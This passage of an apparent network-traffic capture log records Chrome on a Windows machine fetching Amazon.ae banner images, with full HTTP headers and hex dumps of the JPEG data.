                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-645,/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Sat, 06 Aug 2044 23:36:46 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-645 /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 459ec09472abb8544521a9b5cc6706ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 309681
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: OLcXzJEVa1U6Fe0_EObyIFgcPr5db2i9S43nFxawlRk2JZoY4fvV-Q==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1743INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8c 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 07 02 05 06 03 08 10 00 02 01 03 03 02 02 07 07 04 03 00 00 00 00 00 00 01 02 03 04 11 05 12 21 06 13 31 41 07 22 23 51 71 81 91 14 32 42 53 61 62 92 16 34 63 72 73 b1 b2 01 01
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"#Qq2BSab4crs


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        115192.168.2.44989818.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2895
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 57cbfa3b-5a12-4777-9020-0f890d846af1
                                                                                                                                                                                                        Date: Sun, 11 Aug 2024 19:46:50 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-082,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Sat, 06 Aug 2044 19:46:50 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-082 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Via: 1.1 a44309111e5e1050ff485adaa4681ad0.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 323477
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: Sl9SxwqS5uQpjY8Cm83yIYgC8Hq41selBX75Q-dpG0m6_-vw_bZkDw==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC2895INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8f 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 04 06 07 08 01 03 09 10 00 02 01 03 02 04 02 08 03 05 07 05 00 00 00 00 01 02 00 03 04 11 05 21 06 12 31 41 51 71 07 13 14 22 32 61 81 91 23 a1 b1 33 34 52 c1 d1 15 42 72 82
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQq"2a#34RBr


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        116192.168.2.449901151.101.129.16443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC680OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1866
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: d985a862-8e12-4a24-9e6e-f4b102ee4ae4
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:23:57 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 26 Aug 2043 21:06:20 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1221250
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100039-IAD, cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 81 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 03 04 02 10 00 01 03 02 03 05 06 04 04 04 07 00 00 00 00 00 01 00 02 03 04 05 06 11 21 07 12 41 51 61 13 22 31 32 71 72 14 42 81 91 08 a1 b2 c1 15 43 53 b1 23 24
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!AQa"12qrBCS#$
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC488INData Raw: f3 98 e0 78 b7 d1 4c 17 2e ca ee d2 db f1 35 ae 46 8d 66 97 b2 91 83 ca 5b 3f 70 fe cf 0a 79 15 01 f6 69 43 25 5e 24 b1 c6 cf 33 6a 43 8f a4 39 ca e5 3e 0a 55 8e 11 11 45 11 11 01 11 10 11 11 07 4d 54 06 a2 19 e2 69 c8 c9 14 8d 07 91 73 4b 42 d5 bc 75 2e 81 cd 3e 19 b0 02 3a b7 42 16 d4 1a 72 20 a8 15 b6 5c 0e fb 05 ee a2 48 c6 54 f5 cf 7c b0 3f e5 0e 76 b2 c7 f4 79 fb 39 58 95 86 69 26 1b f3 c0 ef 9f 56 fa 8d 51 cd 2e 04 f3 d0 7d 74 5d d2 d0 89 f5 19 b5 ec fb b4 fe e3 af 81 5d e2 23 b9 a8 d4 65 9e 5d 15 47 75 b6 2d d7 3d ca b4 0a a6 c1 dc 3d 0a f6 97 6e 8c d0 7a 01 5d 81 cb a0 15 72 e1 5c 2f 57 8a 6b 99 43 46 35 39 19 25 f9 20 67 17 bc ff 00 61 f3 14 19 af 60 18 64 be 6a eb e4 cd ee b0 18 a0 ea 4e 46 57 0f d2 a4 e2 a7 d9 ed 34 f6 6a 3a 6a 1a 56 ee c3 4e
                                                                                                                                                                                                        Data Ascii: xL.5Ff[?pyiC%^$3jC9>UEMTisKBu.>:Br \HT|?vy9Xi&VQ.}t]]#e]Gu-==nz]r\/WkCF59% ga`djNFW4j:jVN


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        117192.168.2.449902151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC681OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1599
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 39e5cdb4-16a1-4d4f-b236-97d4999816c2
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:23:57 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 25 Sep 2043 01:35:15 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 800450
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100142-IAD, cache-ewr-kewr1740040-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 78 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 01 02 05 07 08 04 03 09 10 00 01 04 00 03 05 03 08 09 05 00 00 00 00 00 00 01 00 02 03 04 05 06 11 07 12 21 31 51 13 71 a1 14 22 41 52 61 62 91 a2 15 16 23 32 42 53 63 83 92 24
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"x!1Qq"ARab#2BSc$
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC221INData Raw: 41 c0 74 1c 11 51 10 42 2e e1 d8 86 0b 72 ce 21 84 c2 2c c5 6c 87 59 a2 5e 22 7f 68 d0 1a 66 ae e3 a3 35 70 00 3d 87 40 e5 f0 3b 43 82 3d 04 d8 66 23 1b fd 5f 21 7b fe 0e 6e ad 2a 7c ae 0e 3d 50 73 3e d8 76 81 7b e8 fa ec a9 52 ed 28 64 97 49 2c cd 11 ad af 46 7a e1 73 95 7d 6f cc 19 04 6e b1 33 bd 0d 6b a7 90 9f 99 cb f4 72 dd 48 6f 44 f8 2c c4 d9 a3 78 f3 a3 91 a1 ed 3d e0 ea 15 b4 68 d7 c3 d9 d9 54 85 90 33 d5 8d 82 31 e0 02 0e 34 c1 f6 47 99 f1 40 1c ea ed a8 c3 f8 ac 3c 30 ff 00 cd bb cf 5d 63 94 b2 cc 19 67 0f af 46 1d 1c e6 37 ed 26 0c 0c 74 ce e6 5c 54 8d 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 01 11 10 11 11 07 ff d9
                                                                                                                                                                                                        Data Ascii: AtQB.r!,lY^"hf5p=@;C=f#_!{n*|=Ps>v{R(dI,Fzs}on3krHoD,x=hT314G@<0]cgF7&t\T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        118192.168.2.449904151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC678OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2215
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: d7777537-309e-465f-ae6b-7697053609df
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:23:57 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 11 Sep 2043 23:02:36 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 796863
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000066-IAD, cache-ewr-kewr1740064-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 85 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 08 07 09 01 02 05 04 03 10 00 01 03 02 04 03 05 05 05 07 05 00 00 00 00 00 01 00 02 03 04 05 06 11 12 21 07 31 41 08 13 32 51 61 14 22 71 72 81 15 42 52 82 91 23 33 54 a1 a2 b1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A2Qa"qrBR#3T
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC837INData Raw: aa ba 76 9d a5 a5 71 23 e4 2a d1 6f d1 11 64 11 11 01 11 10 11 11 07 66 9c 88 5a d3 e2 7d 0b a8 31 15 f6 13 fc 53 9c 3e 12 0d 6d 5b 2a 54 53 b4 75 af d8 f1 1f b4 0e 55 94 b1 3b eb 1e 71 95 bc fc d4 fd 4f 5e de ab f9 6e a8 1c 3d 42 f1 de 34 e6 bd 76 0d 70 4a 39 e9 c8 fe 85 79 33 79 f9 85 9a a9 3d 86 e8 fb 5c f1 56 45 96 b8 5e d7 b3 3d c6 a6 9c c2 f4 19 3d 76 29 ba b9 f2 3b bd a9 ad 94 92 e3 e6 77 fd 1a 14 5e 9c 12 c6 fa a9 3e 18 87 55 c6 07 92 43 29 83 a5 91 c0 e4 43 62 1a b6 3e bc 87 a9 5b c7 8a f9 37 31 19 d6 fd 73 74 fc e7 8a bf 0f 56 03 50 d2 dc ce c7 90 70 1e 4a 43 8a e8 a9 ef 14 7f 6b c0 43 66 8c 34 4c cc fc 63 66 87 7c c3 f9 85 16 ba 5e 2a 2f 35 52 d5 54 bc b9 f2 38 9f 46 83 d1 a3 a0 0b cd af 39 31 8c 1c de 7f 90 53 52 4b 66 7e 19 ba b9 9e df 5f bd
                                                                                                                                                                                                        Data Ascii: vq#*odfZ}1S>m[*TSuU;qO^n=B4vpJ9y3y=\VE^==v);w^>UC)Cb>[71stVPpJCkCf4Lcf|^*/5RT8F91SRKf~_


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        119192.168.2.449905151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC676OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2126
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 23aca6d6-b178-4fac-ae0c-a77d0a5a765f
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:23:57 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 26 Aug 2043 21:06:20 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 807745
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000134-IAD, cache-ewr-kewr1740049-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 7a 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 01 05 06 09 03 04 07 02 10 00 01 04 00 04 04 04 05 02 04 07 00 00 00 00 00 01 00 02 03 04 05 06 11 12 21 31 41 61 07 13 22 51 08 14 32 71 81 72 b1 91 a2 b2 d1 15 16 17 24 42 52
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"z!1Aa"Q2qr$BR
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC748INData Raw: 77 e4 f2 57 f4 45 01 11 10 11 11 01 41 bf 88 3a 4f a3 9a 5d 3f 4b 55 6b 3d 9d b6 6b 0f ee c5 39 14 7a f8 8e cb 3f 3f 83 d5 c5 a3 1e bc 3a 42 24 f7 f2 a7 d0 7f 23 c0 57 04 67 b7 60 5a 86 1c 42 26 35 9a fa 65 63 1a d8 da d7 0e 01 db 1b cb 77 53 a3 57 76 8e 26 34 da ed 1c 1c 08 2d 3c 43 81 e0 41 ec 42 c5 32 f6 23 1d 69 9d 0d 92 45 7b 03 6c 80 12 07 1f a4 90 0b 78 03 cc f4 e7 d3 45 cb 76 b4 f8 4d 99 2a d8 6b 98 f6 1e 4e 1b 5c 41 e4 4f 31 c7 b1 21 51 7d 6f fb 37 8a db 89 8c fa a0 79 e2 40 1c d8 7b b7 91 f7 04 15 80 45 88 1c 12 fd 98 4b 75 86 53 ea 67 2d 03 b9 11 dc 02 42 cb 84 bf 39 09 87 5f 50 3b a3 3e cf 6f 4f b3 c7 a4 f7 d0 f4 58 1e 64 3e 73 e1 9c 7f cd 9a 1f bb 53 47 36 0b 88 16 35 d5 1e 7e 92 e2 c3 fb b7 f3 cd 5c 25 b6 b1 26 44 5d ea 61 f5 0d a7 5f bf f6
                                                                                                                                                                                                        Data Ascii: wWEA:O]?KUk=k9z??:B$#Wg`ZB&5ecwSWv&4-<CAB2#iE{lxEvM*kN\AO1!Q}o7y@{EKuSg-B9_P;>oOXd>sSG65~\%&D]a_


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        120192.168.2.449903151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
